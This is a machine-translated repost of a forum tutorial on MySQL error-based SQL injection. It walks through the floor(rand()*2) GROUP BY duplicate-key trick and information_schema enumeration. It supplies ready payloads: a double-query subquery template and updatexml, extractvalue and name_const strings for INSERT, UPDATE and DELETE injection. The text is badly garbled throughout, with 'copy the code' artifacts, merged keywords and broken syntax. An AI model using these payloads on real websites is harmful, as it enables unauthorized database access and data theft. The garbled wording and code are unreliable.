This article turns from: Http://bbs.blackbap.org/forum.php?mod=viewthread&tid=6483&highlight=mysql%2B error injection
Using SQL injection to obtain database data, the method can be broadly divided into joint query, error, Boolean blind and delay injection, which are usually based on the SQL injection point in SELECT query statement. If the injection of a non-select query is involved, we usually use the MySQL injection query to create a test table using test; CREATE TABLE Test (numint(5) ; INSERT into Test VALUES (1); INSERT into Test VALUES (2); INSERT into Test VALUES (3); INSERT into Test VALUES (4); SELECT*from test; the copy code mainly involves the MySQL function statement:1. Rand () #随机函数2. Floor () #取整函数3. Conunt () #汇总函数4. GROUP BY #分组语句复制代码原理: When a grouping statement is used after an aggregate function, such as the Conunt function, the part of the query is displayed in the wrong form --A simple example from a security researcher: use test; Copy the code and then simply look at the usage of CONCAT select CONCAT ("a","b"); Copy code query What comes out, the following is a look at the role of several other functions select Rand (); Copy code rand () function, the person who has learned programming should know that it is a function range that produces a random number (0,1and then look at the floor () function Select Floor (3.141216545); Copying the code is obviously a function of rounding up Select Floor (rand ()*2); The scope of the copy code Rand () is (0,1)*2==> (0,2) then Floor (rand ()*2after rounding is 0 and 12 number Select CONCAT ((select Database ()), Floor (rand ()*2) ; Copy the code if we add the above sentence from a table, we will return a collection of test0 and test1, the length of which is determined by the number of records in the table, for example, from the test table. Returns 4 rows of data so, how do we filter out the duplicated information? A GROUP BY statement is used here, and group by is used to combine aggregate functions to group result sets based on one or more columns. Let's look at select CONCAT ((select Database ()), Floor (rand ()*2)) asA fromtest GROUP by A; Copy the code so there's not a lot of useless information. Simply explain the statement: CONCAT ((SELECT Database ()), Floor (rand ()*2)) asA This is to rename the column name to a, look at the comparison to know that group by a will be based on the data of a column, the query out the same data into a group, so we see the data is only two different similarities, we can be the database () Change to something else you want to query, such as version (), @ @data, and so on. When we inject the time is usually through the MySQL information_schema this database to query information, query data name query schemata schema_name this column BaukuSelect* frominformation_schema.schemata; Copy the code, it's my data name. Pop-up list select DISTINCT table_name from information_schema.tables; Copy code Pop-up name select DISTINCT table_name from information_schema.tables; Copy code It's too long for me to go check it out. The direct query is the Select username, Password from admin; If the list of names and tables is present, we can use the error injection to find out what data we want .SelectCount (*), concat ((SelectVersion ()), Floor (rand () *2)) asA fromInformation_schema.tables Group by A; Copy the code in order to look good, you can add some markup.SelectCount (*), concat ('--',(SelectUser ()),'--', Floor (rand () *2)) asA fromInformation_schema.tables Group by A; a more advanced copy of the code is that the double injection query that we really use is a nested subquery for SELECT, It's just a select. A SELECT query statement is usually a fixed format that applies to an injection union that has no return position and cannot be determined by an order bySelect 1 from(Select+count (*), concat (Floor (rand (0)*2), (Injection burst data statement)) a frominformation_schema.tables GROUP by a) b The blue part is the basic error principle we talked about, and union is because when we inject the site, others query the data we use the Union keyword for joint queries, as I'm not using a select query.?if it is not a select, we can put this statement nested inside it, such as using the OR keyword, such as query, can also be injected, this is more flexible details can refer to this article http://www.exploit-db.com/wp-content/themes/exploit/docs/33253.pdforiginally wanted to paste a cloud address, but think about it or forget it. A simple test, or can be, the main use of the code is these or Updatexml (1, Concat (0x7e, (version ())),0) or"'or Extractvalue (1, Concat (0x7e, database ())) or"'or (SELECT* FROM (SELECT (version (), Name_const1), Name_const (version (),1)) a) or"'Copy the code is basically three kinds, and some others are not posted out, are placed in the INSERT, delete and update the field after a simple example of the INSERT into test values (5or Updatexml (1, Concat (0x7e, (version ())),0) or"'Copy code Remember to add two single quotes to the back! About the example, you can search the forum, see 30 of the post it. Here's not a demo. Link http://bbs.blackbap.org/thread-2360-1-1.htmlhttp//bbs.blackbap.org/thread-2235-1-1.htmlPS: Write not good Daniel do not spray, do not know how typesetting, in fact, I care about is not the content of the composition in the end, thank you for viewing the reference article: http://www.cnseay.com/2363/http//bugs.mysql.com/bug.php?id=8652http//Www.websec.ca/kb/sql_injection#MySQL_Specific_Code
"Beginners Learn to inject" The MySQL error injection detailed